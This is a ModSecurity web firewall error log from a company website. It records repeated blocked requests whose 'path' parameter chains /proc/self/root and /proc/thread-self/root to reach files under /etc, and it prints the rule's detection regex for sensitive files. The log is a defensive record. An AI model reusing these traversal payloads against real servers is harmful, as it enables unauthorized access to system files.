[Mon Mar 16 14:05:06.959809 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:56084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4QrysWC90G-1nBrBMGQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:07.563446 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:51872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4Q5qj1wV0Si-Okef2SwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:08.283210 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:56098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4RFajLEzk2WiQ-10ZZwAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:10.489286 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:56102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4RY6lpbStxTqkSktzjQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:13.951575 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.243.203:54732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4SVajLEzk2WiQ-10ZagAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:15.287654 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:54740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4S9SswJuvopo3lOhmKwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:23.675509 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:54750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4U9SswJuvopo3lOhmOwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:26.196024 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:39788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4VrABkC4fWIHEf8H12wAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:05:28.570416 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:39790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4WLysWC90G-1nBrBMHQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:12.751721 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:39798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4hLABkC4fWIHEf8H2DAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:14.083425 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:51402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4hnjZBu2q05ozVU9gcQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:21.022721 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:51414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4jZqj1wV0Si-Okef2XAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:36.298951 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:58620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4nLABkC4fWIHEf8H2HgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:37.652309 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:42282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4nbysWC90G-1nBrBMKAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:42.075470 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:37880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4ov9ocpUE4ed4uDz3SgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:06:54.547917 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:42298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4rtSswJuvopo3lOhmeAAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:06.219713 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.228.16:41026] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg4ulajLEzk2WiQ-10ZhgAAApU"]
[Mon Mar 16 14:07:18.203466 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:36060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4xv9ocpUE4ed4uDz3YwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:18.239572 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:37030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4xrysWC90G-1nBrBMRwAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:19.571404 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:32990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4x6TCbgAP5jq5TegyVgAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:26.568969 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:59288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4zv9ocpUE4ed4uDz3bgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:30.455408 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:59298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg40lajLEzk2WiQ-10ZkQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
